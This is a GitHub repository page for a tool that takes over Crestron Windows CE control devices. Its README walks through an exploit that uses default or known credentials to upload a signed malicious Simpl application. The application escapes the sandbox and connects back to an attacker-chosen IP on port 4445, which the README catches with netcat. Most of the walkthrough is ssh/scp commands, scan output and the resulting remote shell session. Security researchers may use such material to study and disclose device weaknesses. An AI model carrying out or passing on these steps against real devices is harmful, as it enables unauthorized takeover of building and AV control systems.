Skip to content
/ crestron Public

Tools for taking over Crestron Windows CE devices

31 stars 5 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

brandonprry/crestron

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

29 Commits
unzip
unzip
 
 
README.md
README.md
 
 
fdsa_signed.dll
fdsa_signed.dll
 
 
fdsa_unsigned.dll
fdsa_unsigned.dll
 
 
pro3.lpz
pro3.lpz
 
 
shell.cs
shell.cs
 
 

Repository files navigation

crestron

Tools for taking over Crestron Windows CE devices without the need for Crestron Toolbox.

If you have authenticated access, or the default crestron:<blank> credentials are still enabled, you can use the provided Simpl application to load a malicious application that breaks out of the sandbox to connect back to you.

In a perfect world, Crestron Simpl applications run in a sandbox and are signed with a special Crestron certificate that is shipped with Crestron Toolbox or the Simpl IDE. However, the application in this repository is a signed Crestron application that breaks out of the Simpl sandbox on supported Crestron Windows CE devices. Windows .NET Compact Framework v3.5 is the expected target.

The ports available to the interface can change depending on the device type, and whether you are looking at the control side or the LAN side. If the device has only the LAN interface connected, it will listen with all ports on that interface. Otherwise, the control ports will be listening on the control interface. The key ports are 21, 22, 23, 41794, or 41795.

$ nmap 192.168.1.174
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 13:46 CDT
Nmap scan report for DMPS3-7f81812f.attlocal.net (192.168.1.174)
Host is up (0.0036s latency).
Not shown: 993 closed tcp ports (conn-refused)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
80/tcp   open  http
443/tcp  open  https
843/tcp  open  unknown
6510/tcp open  mcer-port

This assumes you are starting from a clean slate. If you would like to factory reset the device to ensure nothing weird happens, SSH into the device and run RESTORE.

mkdir tmp
cd tmp
unzip ../pro3.lpz
ssh [email protected] del \\User\\*
scp * [email protected]:\\User
ssh [email protected] copy \\User\\boot.bt \\Simpl\\App01\\
ssh [email protected] copy \\User\\fdsa_archive.zip \\Simpl\\App01\\
ssh [email protected] copy \\User\\fdsa.bin \\Simpl\\App01\\
ssh [email protected] copy \\User\\fdsa.cdm \\Simpl\\App01\\
ssh [email protected] copy \\User\\fdsa.dll \\Simpl\\App01\\
ssh [email protected] copy \\User\\fdsa.rte \\Simpl\\App01\\
ssh [email protected] copy \\User\\SimplSharpCustomAttributesInterface.dll \\Simpl\\App01\\
ssh [email protected] copy \\User\\SimplSharpData.dat \\Simpl\\App01\\
ssh [email protected] copy \\User\\SimplSharpHelperInterface.dll \\Simpl\\App01\\
ssh [email protected] copy \\User\\SplusLibrary.dll \\Simpl\\App01\\
ssh [email protected] copy \\User\\SplusManagerApp.exe \\Simpl\\App01\\
ssh [email protected] copy \\User\\SplusObjects.dll \\Simpl\\App01\\
ssh [email protected] progregister -P:all
ssh [email protected] progreset

Other Devices

If you can telnet or SSH into the device, the command prompt will contain the RackType that you can update boot.bt with.

$ telnet 192.168.1.174
Trying 192.168.1.174...
Connected to 192.168.1.174.
Escape character is '^]'.
DMPS3-4K-150-C Console
Warning: Another console session is open 

DMPS3-4K-150-C>

In boot.bt, the RackType is in the first stanza and by default is the PRO3.

[LG_BOOT_DATA]
BinFileName=fdsa.bin
SMWFileName=fdsa.smw
NumberSymbols=15
NumberSignals=33
RouteFileName=fdsa.rte
CUZ=1.007.0017
RackType=PRO3                 <---------- here
SymParamVersion=21.007.0017
NumberParameters=3
NumRealIntegralParams=0
NumRealStringParams=3
NVRAMUsed=0

[...snip...]

Replacing PRO3 with the device type will ensure the device does not reject the application.

Using the shell

The shell expects a \User\ip file with the IP address to connect back to. Port 4445 is hardcoded.

$ echo -n 192.168.1.123 > ip
$ scp ip [email protected]:/User

Once the connection is made, you can begin interacting outside of the sandbox.

$ nc -l 4445
Connected
 > ls
\Network
\Windows
\Temp
\Program Files
\My Documents
\HTML
\Sys
\Simpl
\Nvram
\FTP
\User
\ROMDISK
\Application Data
\My Recent Documents
\Recycled
\SSHBanner
 >

For instance, compared to the sandbox directory list.

$ telnet 192.168.1.174
Trying 192.168.1.174...
Connected to dmps3-7f81812f.attlocal.net.
Escape character is '^]'.
DMPS3-4K-150-C Console
Warning: Another console session is open 

DMPS3-4K-150-C>dir
Directory of \
      [DIR]  09-21-15 08:58:24 FTP
      [DIR]  09-21-15 08:58:24 HTML
      [DIR]  09-21-15 08:58:24 Nvram
      [DIR]  09-21-15 08:58:26 ROMDISK
      [DIR]  09-21-15 08:58:24 Simpl
      [DIR]  09-21-15 09:05:26 SSHBanner
      [DIR]  09-21-15 08:58:24 Sys
      [DIR]  09-21-15 08:58:26 User

DMPS3-4K-150-C>

Available commands are ls, pwd, exec, cat, cd, and base64.

On PRO3, for instance, you can run a graphics test executable for demonstration of the issue.

 > exec \Windows\cube.exe

A spinning cube will replace the Crestron menu on the display.

About

Tools for taking over Crestron Windows CE devices

Resources

Readme
Activity

Stars

31 stars

Watchers

1 watching

Forks

5 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages